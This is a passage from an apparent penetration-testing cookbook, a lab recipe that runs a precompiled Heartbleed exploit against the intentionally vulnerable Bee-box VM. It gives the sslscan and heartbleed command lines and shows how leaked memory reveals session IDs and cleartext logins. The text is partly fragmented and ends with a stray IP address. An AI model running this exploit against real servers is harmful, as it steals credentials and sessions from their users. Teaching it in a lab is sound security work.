In this recipe, we will use our previously compiled Heartbleed exploit to extract information about the vulnerable Bee-box server (https://192.168.56.103:8443/
in this recipe).
The Bee-box virtual machine can be downloaded from https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/ and the installation instructions are there too.
In the previous recipe, we generated an executable from the Heartbleed exploit; we will now use that to exploit the vulnerability on the server.
As Heartbleed is a vulnerability that extracts information from the server's memory, it may be necessary to browse and send requests to the server's HTTPS pages on port 8443 (https://192.168.56.103:8443/
) before attempting the exploit in order to have some information to extract.
sslscan 192.168.56.103:8443
cd heartbleed
./heartbleed --help
hb_test.txt
:./heartbleed -s 192.168.56.103 -p 8443 -f hb_test.txt -t 1
hb_test.txt
:cat hb_test.txt
Our exploit extracted information from the HTTPS server and, from that, we can see a session ID and even a full login request including a username and password in clear text.
strings
command:strings hb_test.txt
As mentioned in Chapter 4, Finding Vulnerabilities, Heartbleed vulnerability allows an attacker to read information from the OpenSSL server memory in clear text, which means that we don't need to decrypt or even intercept any communication between the client and the server, we simply ask the server what's in its memory and it responds with the unencrypted information.
In this recipe, we have used a publicly available exploit to perform the attack and obtained at least one valid session ID. It is sometimes possible to find passwords or other sensitive information with Heartbleed dumps.
Finally, the strings
command displays only printable strings in files, skipping all the special characters thereby making it easier to read.
18.118.200.154